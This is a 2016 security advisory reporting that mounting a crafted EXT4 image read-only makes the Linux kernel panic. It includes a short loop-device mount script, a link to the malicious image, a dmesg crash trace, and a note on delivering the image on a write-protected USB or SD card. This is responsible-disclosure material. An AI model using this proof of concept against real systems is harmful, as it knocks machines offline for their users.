OS-S Security Advisory 2016-23 Local DoS: Linux Kernel EXT4 Error Handling (EXT4 calling panic()) Date: October 31th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: Not yet assigned CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) Severity: Critical Ease of Exploitation: Trivial Vulnerability Type: Error handling leads to conscious panic() call Abstract: Mounting a crafted EXT4 image as read-only leads to a kernel panic. Since the mounting procedure is a privileged operation, an attacker is probably not able to trigger this vulnerability on the commandline. Instead the automatic mounting feature of the GUI via a crafted USB-device is required. Detailed product description: We have verified the bug on the following kernel builds: Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64) RedHat Kernel 3.10.0-327.18.2.el7.x86_64 Vendor Communication: We contacted RedHat on May, 03th 2016. To this day, no security patch was provided by the vendor. We publish this Security Advisory in accordance with our responsible disclosure policy. Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1332506 Proof of Concept: As a proof of concept, we are providing the image that is causing a panic() call. For demonstration purposes a script to mount this filesystem is also attached. Severity and Ease of Exploitation: The vulnerability can be easily exploited as a Denial-of-Service remotely by using a USB-device. In this case the attacker must copy this image (e.g. using dd) to a device or storage such as a SD-card which can be set to read-only mode (using the write-protection switch). Mount-Script: cp ext4_fs_file /tmp/ mkdir /tmp/a sudo losetup /dev/loop0 /tmp/ext4_fs_file sudo mount -o ro /dev/loop0 /tmp/a Malicious EXT4-Image (BASE64 Encoded): https://os-s.net/advisories/OSS-2016-23-image dmesg-Report: / # ./mount.sh [ 11.269750] EXT4-fs (loop0): Unrecognized mount option "" or missing value [ 11.278081] EXT4-fs (loop0): failed to parse options in superblock: [ 11.286825] EXT4-fs: Warning: mounting with data=journal disables delayed allocation and O_DIRECT support! [ 11.295852] EXT4-fs warning (device loop0): ext4_fill_super:3568: fragment/cluster size (0) != block size (1024) [ 11.304393] EXT4-fs (loop0): ext4_check_descriptors: Checksum for group 0 failed (58173!=0) [ 11.317625] EXT4-fs (loop0): revision level too high, forcing read-only mode [ 11.327470] EXT4-fs (loop0): orphan cleanup on readonly fs [ 11.332096] EXT4-fs error (device loop0): ext4_get_group_desc:288: comm mounter: block_group >= groups_count - block_group = 1023983, groups_count = 1 [ 11.353372] Kernel panic - not syncing: EXT4-fs (device loop0): panic forced after error [ 11.353372] [ 11.361499] CPU: 0 PID: 143 Comm: mounter Tainted: G OE 4.6.0-rc6 #5 [ 11.369343] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 [ 11.378184] ffff88002155d710 ffff88002103f6f8 ffffffff819fdf81 ffffffffc019e240 [ 11.384350] ffff88002103f7d0 ffff88002103f7c0 ffffffff814643fc 0000000041b58ab3 [ 11.390465] ffffffff82f1fcbb ffffffff81464272 0000000000000000 ffff880000000010 [ 11.396134] Call Trace: [ 11.398812] [<ffffffff819fdf81>] dump_stack+0x63/0x82 [ 11.410022] [<ffffffff814643fc>] panic+0x18a/0x2ef [ 11.415285] [<ffffffff81464272>] ? set_ti_thread_flag+0xf/0xf [ 11.422216] [<ffffffff8166d48c>] ? __sync_dirty_buffer+0x14c/0x1a0 [ 11.427425] [<ffffffffc0104e78>] ext4_handle_error.part.190+0x298/0x2e0 [ext4] [ 11.433536] [<ffffffffc0104fc6>] __ext4_error+0x106/0x1b0 [ext4] [ 11.438436] [<ffffffffc0104ec0>] ? ext4_handle_error.part.190+0x2e0/0x2e0 [ext4] [ 11.444580] [<ffffffff8125f36a>] ? vprintk_default+0x5a/0x90 [ 11.449308] [<ffffffff81570fb6>] ? kasan_unpoison_shadow+0x36/0x50 [ 11.459341] [<ffffffff81464823>] ? power_down+0xc4/0xc4 [ 11.463704] [<ffffffff8170752b>] ? proc_alloc_inum+0x8b/0x170 [ 11.468337] [<ffffffff817074a0>] ? __proc_create+0x5a0/0x5a0 [ 11.476158] [<ffffffffc0069cb6>] ext4_get_group_desc+0x1f6/0x2e0 [ext4] [ 11.481386] [<ffffffffc0103d0c>] ? __ext4_msg+0x13c/0x150 [ext4] [ 11.486315] [<ffffffffc0077a33>] ext4_read_inode_bitmap+0x23/0x14c0 [ext4] [ 11.491811] [<ffffffffc007d76f>] ext4_orphan_get+0xff/0x4e0 [ext4] [ 11.501660] [<ffffffffc0191ffd>] ? ext4_register_sysfs+0x1ad/0x290 [ext4] [ 11.507700] [<ffffffffc010c9ef>] ? ext4_register_li_request+0xdf/0x740 [ext4] [ 11.515257] [<ffffffffc01181e6>] ext4_fill_super+0x8936/0x9ab0 [ext4] [ 11.521387] [<ffffffffc010f8b0>] ? ext4_calculate_overhead+0xd00/0xd00 [ext4] [ 11.532063] [<ffffffff81a29000>] ? pointer+0xa70/0xa70 [ 11.541636] [<ffffffff8157102e>] ? kasan_kmalloc+0x5e/0x70 [ 11.546815] [<ffffffff8156d04b>] ? __kmalloc+0xeb/0x230 [ 11.551595] [<ffffffff814a3604>] ? register_shrinker+0x84/0x1e0 [ 11.558138] [<ffffffff81a2ad28>] ? snprintf+0x88/0xa0 [ 11.562158] [<ffffffff81a2aca0>] ? vsprintf+0x20/0x20 [ 11.566260] [<ffffffff815c8cf0>] ? ns_test_super+0x60/0x60 [ 11.570504] [<ffffffff815cb8a5>] mount_bdev+0x275/0x320 [ 11.574572] [<ffffffffc010f8b0>] ? ext4_calculate_overhead+0xd00/0xd00 [ext4] [ 11.586625] [<ffffffffc00cd5e5>] ext4_mount+0x15/0x20 [ext4] [ 11.591910] [<ffffffff815cce31>] mount_fs+0x81/0x2c0 [ 11.597510] [<ffffffff8161ef5b>] vfs_kern_mount+0x6b/0x330 [ 11.604139] [<ffffffff81626c28>] do_mount+0x428/0x28b0 [ 11.608389] [<ffffffff814c553e>] ? strndup_user+0x4e/0xc0 [ 11.612704] [<ffffffff81626800>] ? copy_mount_string+0x20/0x20 [ 11.623559] [<ffffffff8157102e>] ? kasan_kmalloc+0x5e/0x70 [ 11.629014] [<ffffffff81571352>] ? kasan_slab_alloc+0x12/0x20 [ 11.636190] [<ffffffff815702cf>] ? __kmalloc_track_caller+0xbf/0x210 [ 11.641408] [<ffffffff814c553e>] ? strndup_user+0x4e/0xc0 [ 11.645754] [<ffffffff814c5422>] ? memdup_user+0x42/0x70 [ 11.650056] [<ffffffff81629c45>] SyS_mount+0x95/0xe0 [ 11.653852] [<ffffffff82869a36>] entry_SYSCALL_64_fastpath+0x1e/0xa8 [ 11.666389] Kernel Offset: disabled [ 11.670125] Rebooting in 1 seconds.. -- OpenSource Training Ralf Spenneberg http://www.os-t.de Am Bahnhof 3-5 48565 Steinfurt Germany Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757